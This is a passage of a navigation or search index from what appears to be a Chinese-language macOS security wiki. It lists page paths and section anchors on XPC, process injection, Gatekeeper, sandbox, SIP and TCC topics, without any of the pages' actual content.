,"macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#变体-1在事件处理程序外部调用-xpc_connection_get_audit_token","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#变体-2回复转发","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#发现问题","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.html#修复","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#macos-通过任务端口进行线程注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#代码","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#1-线程劫持","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#2-用于通信的-mach-端口","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#3-基本内存读写原语","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#使用执行原语进行内存读写","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-in
ter-process-communication/macos-thread-injection-via-task-port.html#识别合适的函数","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#4-共享内存设置","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#进程概述","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#5-实现完全控制","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#6-apple-silicon-arm64e-的细微差别","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#7-使用-endpointsecurity-进行检测和加固","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#加固运行时考虑","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#8-最近的公共工具2023-2025","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#macos-java-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#枚举","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#_java_options","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-java-apps-injection.html#vmoptions-文件","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abu
se/macos-library-injection/index.html#macos-library-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#dyld-进程","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#dyld_insert_libraries","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#库验证","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#dylib-劫持","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#make-it-owned-by-root-and-suid","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#insert-the-library","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#remove-suid","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#apply-runtime-proetction","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#apply-library-validation","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#sign-it","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#if-the-signature-is-from-an-unverified-developer-the-injection-will-still-work","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#if-its-from-a-verified-developer-it-wont","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/index.html#apply-cs_restrict-protection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.html#macos-dyld-hijack
ing--dyld_insert_libraries","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.html#dyld_insert_libraries-基本示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.html#dyld-劫持示例","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.html#更大规模","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#macos-dyld-进程","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#流程","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#存根","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#查找惰性符号","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#apple-参数向量","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#dyld_all_image_infos","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#dyld-环境变量","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#调试-dyld","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#其他","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-process.html#参考","macos-h
ardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#macos-perl-applications-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#通过-perl5opt-和-perl5lib-环境变量","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#其他有趣的环境变量","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#通过依赖项inc-滥用","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#通过迁移助手绕过-sip-cve-2023-32369-migraine","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#加固建议","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.html#macos-python-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-python-applications-injection.html#通过-pythonwarnings-和-browser-环境变量","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.html#macos-ruby-applications-injection","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.html#rubyopt","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#macos-net-应用程序注入","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#net-core-调试","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#建立调试会话","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#读取内
存","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#写入内存","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#net-core代码执行","macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#macos-安全保护","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#gatekeeper","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#进程限制","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#macf","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#sip---系统完整性保护","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#沙盒","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#tcc----透明性同意和控制","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#启动环境约束与信任缓存","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#mrt---恶意软件移除工具","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#背景任务管理","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#枚举","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/index.html#操作-btm","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#macos-gatekeeper--quarantine--xprotect","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#gatekeeper","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatek
eeper.html#应用程序签名","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#notarization","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#spctl--syspolicyd","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#隔离文件","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#xprotect","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#不是-gatekeeper","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#gatekeeper-绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2021-1810","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2021-30990","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2022-22616","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2022-32910","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2022-42821","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2023-27943","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2023-27951","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2023-41067","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#cve-2024-27853","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#第三方解压工具错误传播隔离-20232024","macos-hardening/macos-security-and-pri
vilege-escalation/macos-security-protections/macos-gatekeeper.html#uchg-来自这个--talk-","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#防止隔离-xattr","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#macos-启动环境约束与信任缓存","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#lc-类别","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#反向工程-lc-类别","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#环境约束","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#信任缓存","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#枚举信任缓存","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#攻击缓解","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#xpc守护进程保护","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#electron保护","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-launch-environment-constraints.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#macos-sandbox","macos-hardening/macos-security-and-privilege-escalation/macos-securit
y-protections/macos-sandbox/index.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#容器","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#沙盒配置文件","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#沙箱配置文件示例","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#沙箱跟踪","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#沙箱检查","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#macos-和-ios-沙箱配置文件","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#app-store-应用中的自定义-sbpl","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#编译和反编译沙箱配置文件","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#调试和绕过沙箱","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#沙箱扩展","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#检查-pid-权限","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#unsuspend","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#mac_syscall","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#sandboxkext","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#macf-hooks","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/index.html#sandboxd","macos-hardening/macos-security-an
d-privilege-escalation/macos-security-protections/macos-sandbox/index.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-default-sandbox-debug.html#macos-默认沙箱调试","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#macos-sandbox-debug--bypass","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#sandbox-loading-process","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#可能的绕过方法","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#绕过隔离属性","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#利用-open-功能","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#启动代理守护进程","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#利用自动启动位置","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#利用其他进程","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#可用的系统和用户-mach-服务","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#可用的-pid-mach-服务","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#静态编译与动态链接","macos-hardening/macos-security-and-privilege-escalation/macos-security
-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#shellcodes","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#不继承的限制","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#权限","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#interposting-bypass","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#使用-lldb-调试和绕过沙箱","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/index.html#references","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.html#macos-office-sandbox-bypasses","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.html#word-sandbox-bypass-via-launch-agents","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.html#word-sandbox-bypass-via-login-items-and-zip","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.html#word-sandbox-bypass-via-login-items-and-zshenv","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-bypass/macos-office-sandbox-bypasses.html#word-sandbox-bypass-with-open-and-env-variables","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sandbox/macos-sandbox-debug-and-byp
ass/macos-office-sandbox-bypasses.html#word-sandbox-bypass-with-open-and-stdin","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.html#macos-authorizations-db--authd","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.html#授权数据库","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.html#示例","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-authorizations-db-and-authd.html#authd","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#macos-sip","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#sip-状态","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#其他限制","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#与-sip-相关的权限","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#sip-绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#安装包","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#不存在的-sip-文件","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#comapplerootlessinstallheritable","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#comapplerootlessinstall","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#密封系统快照","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-sip.html#检查快照","macos-hardening/macos-security-and-privilege-e
scalation/macos-security-protections/macos-tcc/index.html#macos-tcc","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#tcc-数据库","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#tcc-签名检查","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#权限与-tcc-权限","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#敏感未保护位置","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#用户意图--comapplemacl","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#tcc-权限提升与绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#插入到-tcc","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#tcc-payloads","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#apple-events","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#automation-finder-to-fda","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#automation-se-to-some-tcc","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#自动化-se--辅助功能--ktccservicepostevent-ktccserviceaccessibility---到-fda","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#ktccserviceaccessibility-到-fda","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#端点安全客户端到-fda","macos-hardening/macos-security-and-privilege-escalation/macos-security-
protections/macos-tcc/index.html#系统策略-sysadmin-文件到-fda","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#用户-tcc-数据库到-fda","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#fda-到-tcc-权限","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#sip-绕过到-tcc-绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#tcc-绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/index.html#参考文献","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.html#macos-apple-events","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-apple-events.html#基本信息","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#macos-tcc-bypasses","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#按功能","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#写入绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#tcc-clickjacking","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#tcc-请求任意名称","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#ssh-绕过","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#处理扩展---cve-2022-26767","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#icloud","mac
os-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#ktccserviceappleevents--自动化","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#by-app-behaviour","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-20209934---tcc","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2021-30761---备注","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2021-30782---迁移","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2023-38571---音乐与电视","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#sqlite_sqllog_dir---cve-2023-32422","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#sqlite_auto_trace","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#mtl_dump_pipelines_to_json_file---cve-2023-32407","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#apple-remote-desktop","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#通过--nfshomedirectory","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-20209934---tcc-1","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2020-27937---directory-utility","macos-hardening/macos-security-and-privilege-escala
tion/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2021-30970---powerdir","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#通过进程注入","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2020-27937---directory-utility-1","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2020-29621---coreaudiod","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#设备抽象层-dal-插件","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#firefox","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2020-10006","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2023-26818---telegram","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#通过开放调用","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#终端脚本","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#通过挂载","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2020-9771---mount_apfs-tcc-绕过和权限提升","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2021-1784--cve-2021-30808---在tcc文件上挂载","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#cve-2024-40855","macos-hardening/macos-securi
ty-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#asr","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#位置服务","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#通过启动应用程序","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#通过grep","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#合成点击","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/index.html#参考","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.html#macos-apple-scripts","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-bypasses/macos-apple-scripts.html#apple-scripts","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#macos-tcc-payloads","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#桌面","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#文档","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#下载","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#照片库","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#联系人","macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-tcc/macos-tcc-payloads.html#日历","macos-hardening/macos-security-and-privilege-escalation/macos
